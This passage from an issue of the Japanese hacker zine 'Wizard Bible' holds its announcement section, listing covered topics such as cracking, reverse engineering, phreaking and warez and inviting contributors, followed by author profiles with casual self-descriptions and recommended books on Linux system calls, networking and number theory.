第6章:お知らせ --- x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ○取り扱う具体的な分野は次に示すものです。 ・ハッキング(セキュリティネタはこちらに含める) ・クラッキング(ウイルスやトロイの木馬系も含む) ・リバースエンジニアリング(シリアル解析、ゲーム改造、オンラインゲームの チートを含む) ・コーディング(純粋なプログラミングネタでもクラッキングに近い内容でもよ い) ・ソーシャルエンジニアリング(開錠技術、侵入技術も含む) ・暗号 ・フリーキング(一般電話、携帯電話、公衆電話などの話題や電話システムの話) ・ツール(ツールに特化した話題はこちら) ・ウェアーズ(共有ソフトやエミュレータはこちらに含める) ・ウォッチング(サイトや掲示板のウォッチングネタ) ・ハードクラッキング(自販機、ゲーセンのゲーム機などの怪しい裏技など) ○目標としては、1ヶ月に1回の頻度で発行したいと思っています(予定では毎 月15日に発行)。 ○誤植などのお知らせはIPUSIRON宛て(ipusiron@ruffnex.oc.to)にお願いしま す。 ○幅広く初心者から上級者までをターゲット層としたいので、執筆陣に参加した い方は気軽にメールください。初心者からパワーユーザーまで幅広い層をターゲ ットにしたいので、マニアックなネタ、読み物系のネタ、初心者向けのネタなど 何でも構いません。オリジナルのネタじゃなくても、読みやすく編集・翻訳した だけでも十分、一つの記事と言えます。  別に『Wizard Bible』でチームを組んでいるわけではないので、他のチームに 属している人であっても気にする必要は無いと思います。  グループやチームに関わらず、自分が興味を持った事柄についてのレポートの 発表の場だと思ってください。 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ---- 第7章:著者プロフィール --- x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x  今回は各著者にオススメの本をコンピュータの分野に限らず1冊選んでもらい ました。今後も、オススメツールや本などを紹介してもらいたいと思います。 ■PaiN Job: Student Web: Hex51(http://hex51.darktech.org/) Mail:ss@comeon.to Team(Group):Secret Comment:  どうも。某BBSの住人PaiNです。趣味は、プログラミング、PerlやCをやってい ます。  夏に向けて筋トレ中でもあります。 オススメ本:『Linuxシステムコール』塚越一雄著(技術評論社)  タイトルの通り、Linuxのシステムコール本です。1つの段階毎にサンプルプロ グラムが載っているので分かりやすく、入門者にはぴったりだと思います。内容 も難しいものではありませんが、Cの知識は予め必要です。 ■黒猫 Job:Secret Web:N/A Mail:Secret Team(Group):N/A Comment:  net暦数年でウェアーズの味を覚えて以来、自作マシンのパーツ選択も回線種類 の選択も、全てをウェアーズ中心に考えている「ウェアーズ中毒」患者。趣味は、 哲学・心理学・読書・武道・スキー・登山・音楽演奏・netでの質問回答係 等 多 岐にわたるが「どれ一つとしてモノになっていない」という、典型的な移り気体 質。精神に障害があり「ノってる時はのめり込むが、ノらないときは一日中寝て いる」を繰り返している。ソーウツ病かな?ランク付けするときに「白帯」「茶 帯」「初段」「二段」・・・「師範」と武道に換算してもらわないとピンとこな い、山下清的な一面もある(笑)。 オススメ本:N/A ■D Job:SE Web:SEの小箱(http://iron_beasty.tripod.co.jp/) Mail:death_beasty@hotmail.com Team(Group):N/A Comment:  新参者のDです。  様々な会社のネットワークの危ない部分を指摘したいと思っています。趣味はヘ ヴィ・メタルを腹のそこから歌うこと。  まだまだ勉強が足りないところがあると思いますが、優しい目で見守ってくださ い。 オススメ本:月刊誌『ネットワークマガジン』  企業が導入するべきネットワーク技術をわかりやすく説明しているので、一度 学習していても読んでみるとおさらいが完全に出来るために非常に重宝します。  また、新しい機器の宣伝もやっているために新技術セキュリティの勉強にもな ります。  月一の雑誌として読むには最適です。 ■MaD Job:DATA HOUSE Web:http://www.data-house.co.jp/ Mail:mad@data-house.co.jp Team(Group):ruffnex,ad200x,etc... Comment:  元ハカージャパソと危ない28号の百円ライター。趣味は、空き缶拾いと牛乳瓶 のフタ集め。2ちゃんねるでは「矢崎マサユキ」、「白鶴・丸」、「大同曲芸人 」、「泥棒・詐欺師」として通っている。ウソばかりつくので友達はいない。  現在は会社でヒッキーをしているが、将来はネットカフェの店員なるという目 標に向かってまっしぐら。とぁっ!(`Д´)。 オススメ本:N/A ■IPUSIRON Job:N/A Web:- Security Akademeia -(http://akademeia.info/) Mail:ipusiron@ruffnex.oc.to Team(Group):TeamSA,ruffnex,etc... Comment:  この度は初めての編集を担当しました。まだ至らない点があったかもしれませ んが、今後とも『Wizard Bible』を見守ってください。  最近は論理学周辺に興味があります。 オススメ本:『初学者のための整数論』A.ヴェイユ(現代数学社)  暗号理論を学ぶには初等的な整数論を知っておく必要があります。その整数論 の大事な部分を的確に解説しているのがこの本です。19世紀の大数学者ガウスが 「数学は科学の女王であり、数論(整数論のこと)は数学の女王である」と言っ たように、整数論は奥が深く、探求しようとすればいくら時間があっても足りな いぐらいですが、この本を読むことによって基本は押さえられます。  高木貞二の『初等整数論講義』と迷いましたが、高木の本は数百ページある一 方、ヴェイユの本は120ページ(しかも前半60ページが定理などの解説、後半60ペ ージが問題演習の解答)とコンパクトにまとめられていたので、こちらを選びま した。また、ヴェイユの本は、簡単に群や部分群にも触れられている点も評価し ました。  ちなみに、この本では暗号については一つも触れられませんが、数学的思考や 論理性に慣れるにはよいでしょう。